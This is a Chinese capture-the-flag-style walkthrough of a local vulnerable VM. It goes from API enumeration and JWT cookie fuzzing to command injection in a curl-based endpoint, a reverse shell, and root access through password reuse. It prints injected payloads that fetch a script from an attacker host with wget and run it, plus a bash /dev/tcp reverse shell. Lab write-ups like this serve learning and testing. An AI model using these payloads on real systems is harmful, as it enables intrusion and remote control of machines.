# 靶场搭建
下载,直接导入就能用
IP: 192.168.1.137
# 渗透过程
# 信息初收集
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http nginx 1.14.2
8080/tcp open http nginx 1.14.2
# http://192.168.1.137:8080/
[10:55:39] 200 - 2KB - /01
[10:55:39] 200 - 2KB - /1
[10:55:39] 200 - 2KB - /02
[10:55:39] 200 - 2KB - /04
[10:55:40] 200 - 2KB - /2
[10:55:41] 200 - 2KB - /4
[10:56:24] 405 - 64B - /login
[10:56:40] 200 - 29B - /registration
[10:56:41] 405 - 178B - /run
[10:56:42] 500 - 37B - /secret
[10:56:50] 200 - 17B - /test
[10:56:54] 200 - 140B - /users
{"users": [{"username": "patrick", "password": "$pbkdf2-sha256$29000$e0/J.V.rVSol5HxPqdW6Nw$FZJVgjNJIw99RIiojrT/gn9xRr9SI/RYn.CGf84r040"}]}
# api 测试
观察了一下,就是一些接口,拿 bp 根据 res 去测试
尝试使用给的账号和密码登录一下,无果,所以先注册一个账号看看怎么事,发送以下数据包
POST /registration HTTP/1.1 | |
Host: 192.168.1.137:8080 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate, br | |
Connection: close | |
Upgrade-Insecure-Requests: 1 | |
Pragma: no-cache | |
Cache-Control: no-cache | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 21 | |
username=1&password=1 |
得到以下内容:
HTTP/1.1 200 OK | |
Server: nginx/1.14.2 | |
Date: Sun, 05 May 2024 03:18:21 GMT | |
Content-Type: application/json | |
Content-Length: 355 | |
Connection: close | |
{"message": "User 1 was created. Please use the login API to log in!", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTEwMSwianRpIjoiOGJkZGNhMmEtY2I3ZC00MmZjLTk3NzUtMGY4NjNhNTZlYTMxIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4NzkxMDEsImV4cCI6MTcxNDg4MDAwMX0.FVCqQo9SJPzLQybBsVwCw4WAaZUtkIQR5j-Y0mwUy30"} |
login 一下这个账号
POST /login HTTP/1.1 | |
Host: 192.168.1.137:8080 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate, br | |
Connection: close | |
Upgrade-Insecure-Requests: 1 | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 21 | |
username=1&password=1 |
拿到 cookie
HTTP/1.1 200 OK | |
Server: nginx/1.14.2 | |
Date: Sun, 05 May 2024 03:28:37 GMT | |
Content-Type: application/json | |
Content-Length: 600 | |
Connection: close | |
{"message": "Logged in as 1", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTcxNywianRpIjoiNjdhNGM1OGUtMTIwYS00NDYwLTg2OWMtODJmZTU2ZjMxODFlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4Nzk3MTcsImV4cCI6MTcxNDg4MDYxN30.5ipYzn89OxZoXKNv5BbXznQROQjGuICIYZMOVl89LVE", "refresh_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTcxNywianRpIjoiNDhmOWQxZTMtNjg4ZC00YWQyLWI1NzctZjhhOTczNTcxOWFjIiwidHlwZSI6InJlZnJlc2giLCJzdWIiOiIxIiwibmJmIjoxNzE0ODc5NzE3LCJleHAiOjE3MTQ4ODMzMTd9.duC7xa7rPSjsLZpGu22Hw23t4jdDO1N5JgZapbAQidM"} |
看一下 run 接口,根据提示感觉像是 RCE,通过返回的数据为 json 格式,猜测提交也要 json 格式,交了 {"url":"127.0.0.1:8080"}
上去发现还要 secret key
,马上想到 secret
页面。
打开看了一眼,发现 500。结合之前的信息,应该是要 cookie,但是不知道 cookie 的字段名称是什么,只好 fuzz 一下了。
应该不会很复杂,最后得到字段名: access_token_cookie
,通过发送 cookie 拿到了 secret_key: commandexecutionissecret
GET /secret HTTP/1.1 | |
Host: 192.168.1.137:8080 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 | |
Cookie: access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTcxNywianRpIjoiNjdhNGM1OGUtMTIwYS00NDYwLTg2OWMtODJmZTU2ZjMxODFlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4Nzk3MTcsImV4cCI6MTcxNDg4MDYxN30.5ipYzn89OxZoXKNv5BbXznQROQjGuICIYZMOVl89LVE | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate, br | |
Connection: close | |
Upgrade-Insecure-Requests: 1 |
HTTP/1.1 200 OK | |
Server: nginx/1.14.2 | |
Date: Sun, 05 May 2024 03:35:25 GMT | |
Content-Type: application/json | |
Content-Length: 61 | |
Connection: close | |
Set-Cookie: access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg4MDEyNSwianRpIjoiZTlmZWQ0ZjUtZjM2Ny00NWQwLWI4ZTgtZjY1YzMwZmRlN2NmIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4ODAxMjUsImV4cCI6MTcxNDg4MTAyNX0.z-n754xqTpvCmTqnbZNTePOgmkNVZW8MNxWCjeJ9-Uk; Secure; HttpOnly; Path=/ | |
{"ip-address": "", "secret_key": "commandexecutionissecret"} |
然后再去 run 接口添加 secret_key 就可以执行了
POST /run HTTP/1.1 | |
Host: 192.168.1.137:8080 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate, br | |
Connection: close | |
Upgrade-Insecure-Requests: 1 | |
Content-Type: application/json | |
Content-Length: 109 | |
{"url":"127.0.0.1:80", | |
"secret_key":"commandexecutionissecret"} |
# RCE
执行之后发现是 curl 命令,所以想到命令执行,那么就去拼接
{"url":"$(whoami).fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}
发现是能够命令执行的,搞一个反弹 shell 试了一下,发现直接给我 ban 了,估计有关键字检测,好爱
传一个 shell.sh,直接弹
shell.sh 如下
#!/bin/bash | |
bash -i >& /dev/tcp/192.168.1.129/4444 0>&1 |
提交命令如下
{"url":"`wget http://192.168.1.129/shell.txt -O shell.sh`.fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"} | |
{"url":"`chmod +x shell.sh`.fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"} | |
{"url":"`./shell.sh`.fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"} |
OK 了家人们,shell 弹出来了
# 提权
翻一下目录
app.config['SECRET_KEY'] = 'snakeoilisnotgoodforcorporations'
app.config['JWT_SECRET_KEY'] = 'NOreasonableDOUBTthisPASSWORDisGOOD
发现可能的密码,发现后一个是该账号的密码,那么我们直接 sudo su
得到了 root 权限。
# 小结
api 测试 + 命令执行
JWT_SECRET_KEY 是指 JSON Web Token(JWT)的密钥。在使用 JWT 进行身份验证和授权时,通常需要一个密钥来对令牌进行签名和验证。只是这里和 patrick 账号的密码一样 ==、